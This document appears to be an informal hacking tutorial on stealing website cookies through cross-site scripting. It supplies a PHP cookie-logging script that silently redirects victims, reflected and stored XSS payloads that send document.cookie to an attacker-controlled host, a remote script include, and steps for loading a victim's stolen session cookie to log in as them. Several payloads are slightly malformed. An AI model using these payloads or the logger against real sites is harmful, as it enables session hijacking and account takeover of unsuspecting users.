1.)This tutorial is the sequel to my cross site scripting one. If you do not have any knowledge of XSS, then I suggest reading that tutorial first and then coming back to this one.
So what the hell is a cookie and what do they do?
Cookies are little text files created by your browser to remember things. Common uses are to remember usernames, passwords, session ID’s, and site preferences. After you login to a website, a cookie is stored on your computer so that every time you go to a different page on that site, you don’t have to re-authenticate yourself.
You can easily view the cookies stored on your computer by different websites by visiting the site and type in the URL bar
javascript:alert(document.cookie);
This will give you a pop-up box and display the cookies saved for that site.
What’s so good about stealing someone’s cookies?
If you get a hold of someone else’s cookies and replace yours with them, your stored username/password combo or session ID becomes the same as your victim’s, therefore authenticating you on a website as someone else (the victim), without having to know their password. On to the fun part:
2) To successfully steal someone’s cookies you need 3 things:; A webhost that supports PHP, a PHP script that logs the cookies and an XSS vulnerability. If you don’t have a webhost, find a free hosting company that supports PHP and sign up. If you don’t know how to find an XSS vulnerability, read my previous tutorial and learn. But if you don’t have a cooking-logging script, I will supply you with one!
The cookie logger:
cookielog.php
<?php $cookie = $_GET['cookie']; $referer = $_SERVER['HTTP_REFERER']; $date = date('l jS \of F Y h:i:s A'); $info = "Cookie: $cookie \n Referrer: $referer \n $date"; $log = "cookie.txt"; $f = fopen($log, 'a'); fwrite($f, $info); fclose($f); header ("Location: http://www.somesite.com"); ?>
This script will log the victim’s cookies, tell you where they came from and when it happened – to a file called cookie.txt. It then redirects them somewhere else so that they do not find your site, and don’t know what happened. It’s good to know the referrer of your victim because if they’re an admin and have the admin section hidden well, you now have a better chance of finding it.
(Note: make sure you create a file called cookie.txt and make it writeable)
3.) Now the only thing left to do is to get that script to run in your victim***8217;s browser.
If you found a Non-persistent XSS hole, then you’re going to have to get your victim to click on a link that looks similar to:
www.website.com/index.php?title=xss"><document.location="yoursite.com/cookielog.php?cookie="+document.cookie
Or
www.website.com/index.php?title=xss"><window.location="yoursite.com/cookielog.php?cookie="+document.cookie
If you found a persistent XSS hole then your job is easy, place your script where you found the hole and just get someone to view that page!
<script>document.location="yoursite.com/cookielog.php?cookie="+document.cookie</script>
Or
<script>window.location="yoursite.com/cookielog.php?cookie="+document.cookie</script>
If the website has some security and won’t let you use quotes, host your script on your server and inject another script to call the remote one.
<script src=http://www.yoursite.com/script.js></script>
That’s all I’ve got, if you have any questions feel free to post ‚em here or shoot me an e-mail.
::EDIT::
OH NOEZ I FORGOT TO TELL YOU HOW TO USE TEH COOKIES.
Once you’ve got their cookies, you’ll want to use the javascript:void() command, similar to the javascript:alert(document.cookie) as stated previously. First you need to clear your cookies (to put new ones in.) Then in the url bar type
javscript:void(document.cookie=“cookie=value“);ale rt(document.cookie);
If there cookie is called „sessionID“ and it has a value of „123“, then you’d type this:
javascript:void(document.cookie=“sessionID=123″);a lert(document.cookie);
When your cookie is alerted, you’ll see the new value. refresh the page and enjoy your new login.